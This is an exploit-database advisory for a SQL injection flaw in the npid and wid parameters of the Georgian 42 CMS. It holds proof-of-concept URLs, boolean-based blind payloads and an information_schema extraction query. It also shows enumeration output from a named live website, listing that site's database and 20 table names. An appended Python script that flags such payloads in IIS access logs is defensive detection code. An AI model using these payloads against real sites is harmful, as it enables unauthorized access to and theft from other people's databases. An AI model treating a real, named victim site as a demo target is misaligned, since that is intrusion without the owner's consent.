0day.today - Biggest Exploit Database in the World.
42gradusi - SQL injection Vulnerability
Title:
======
42gradusi - SQL injection Vulnerability

Date:
=====
2012-06-20

=======
I'm cheki Member From Inj3ct0r TEAM
=======

Introduction:
=============
42 GRADUSI developed a unique capability product for Georgia digital market - 42 CMS, Content Management System that helps our clients to keep their websites in control. Currently it works for sites operating on both PHP and FLASH platforms.

Vendor Homepage:
http://www.42gradusi.com/

Report-Timeline:
================
2012-06-20

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] npid AND wid

PoC:
http://<TARGET>/?action=news&lang=geo&npid=[SQL]
http://<TARGET>/?action=info&wid=[SQL]

Risk:
The security risk of the sql injection vulnerability is estimated as high.

Server information:
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.9

=====
Payload: wid=867 AND 7656=7656
Payload: npid=235 AND 2982=2982
=====

Exploit:
http://<TARGET>:80/?action=news&lang=geo&npid=-235+SELECT COUNT(table_name) FROM information_schema.TABLES WHERE table_schema='db_name'--+

========================================
Demo:www.worksale.ge
Place: POST
Parameter: wid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: wid=867 AND 7656=7656

Database: worksale
[20 tables]
+----------------------+
| content              |
| content_types        |
| link                 |
| menu                 |
| module_news          |
| module_tenders       |
| redirect             |
| users                |
| users_types          |
| worksale             |
| worksale_category    |
| worksale_color       |
| worksale_erteuli     |
| worksale_momsaxureba |
| worksale_qveknebi    |
| worksale_ra          |
| worksale_rent        |
| worksale_sacvavi     |
| worksale_users       |
| worksale_valuta      |
+----------------------+
===========================================

- Special Thanks: 1337day - Inj3ct0r TEAM AND Anuka Bolqvadze

# 0day.today [2024-07-02] #
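
A detection sketch for the issue above, added here as an example and not part of the original advisory: it scans IIS W3C-format access logs for npid / wid values that are not plain integers, which is what the boolean-based payloads look like once URL-decoded. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parameters the advisory lists as injectable; both carry numeric record ids.
NUMERIC_PARAMS = {"npid", "wid"}
PLAIN_INT = re.compile(r"[0-9]{1,10}")

# Constructed sample in IIS W3C extended format (documentation-range IPs).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-06-20 10:00:01 198.51.100.7 GET /index.php action=news&lang=geo&npid=235 200
2012-06-20 10:00:09 203.0.113.5 GET /index.php action=info&wid=867+AND+7656=7656 200
2012-06-20 10:00:12 203.0.113.5 GET /index.php action=news&lang=geo&npid=235%20AND%202982=2982 200
2012-06-20 10:00:20 198.51.100.7 GET /index.php action=info&wid=867 200
""".splitlines()


def suspicious_params(query):
    """Return [(param, decoded_value)] for npid/wid values that are not plain integers."""
    hits = []
    # parse_qsl URL-decodes and turns '+' into a space, so encoded payloads are normalized.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and not PLAIN_INT.fullmatch(value):
            hits.append((name.lower(), value))
    return hits


def scan_log(lines):
    """Return [(line_no, client_ip, param, value)] for every flagged request."""
    fields, findings = [], []
    for line_no, line in enumerate(lines, 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if line.startswith("#") or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        for param, value in suspicious_params(row.get("cs-uri-query", "")):
            findings.append((line_no, row.get("c-ip", "-"), param, value))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

W3C access logs do not record POST bodies, so for the POST case shown in the demo output the same suspicious_params check has to run on the form-encoded body at a proxy or WAF.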